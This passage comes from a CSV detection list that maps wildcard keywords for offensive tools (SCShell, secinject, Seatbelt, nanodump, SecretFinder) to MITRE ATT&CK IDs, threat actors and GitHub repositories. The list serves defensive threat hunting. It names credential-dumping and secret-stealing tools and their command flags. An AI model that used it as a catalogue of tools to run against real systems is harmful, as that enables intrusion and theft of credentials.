T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 
- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*SCShell.exe*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshell.py*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbof.c*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbof.o*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scshellbofx64*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on 
ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*scumjr*dirtycow-vdso*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" +"*Search cached MSI files in C:/Windows/Installer/*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" 
+"*search_for_secrets(*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*Search-cpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*SearchOutlook.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*searchsploit -m *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*searchsploit -x *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*searchsploit_rc*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*seatbelt -*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - 
T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*seatbelt all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Seatbelt* -group=all*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" +"*Seatbelt.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*Seatbelt.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SeatbeltNet*.exe*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. 
and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*secgroundzero*","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secgroundzero","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sec-inject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.cna*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.git*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.x64*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject.x86*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" +"*secinject/src*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" 
+"*SecLists*","offensive_tool_keyword","SecLists","SecLists is the security testers companion. Its a collection of multiple types of lists used during security assessments. collected in one place. List types include usernames. passwords. URLs. sensitive data patterns. fuzzing payloads. web shells. and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.","T1210.002 - T1212.001 - T1589.001","TA0040 - TA0006 - TA0001","N/A","N/A","Exploitation tools","https://github.com/danielmiessler/SecLists","1","1","N/A","N/A","10","49213","23242","2023-09-23T07:17:59Z","2012-02-19T01:30:18Z" +"*--seclogon-leak-local*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*--seclogon-leak-remote*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*secrary*","offensive_tool_keyword","Github Username","github username hosting process injection codes ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/secrary","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*secredump.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*secret_fragment_exploit.py */_fragment*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in 
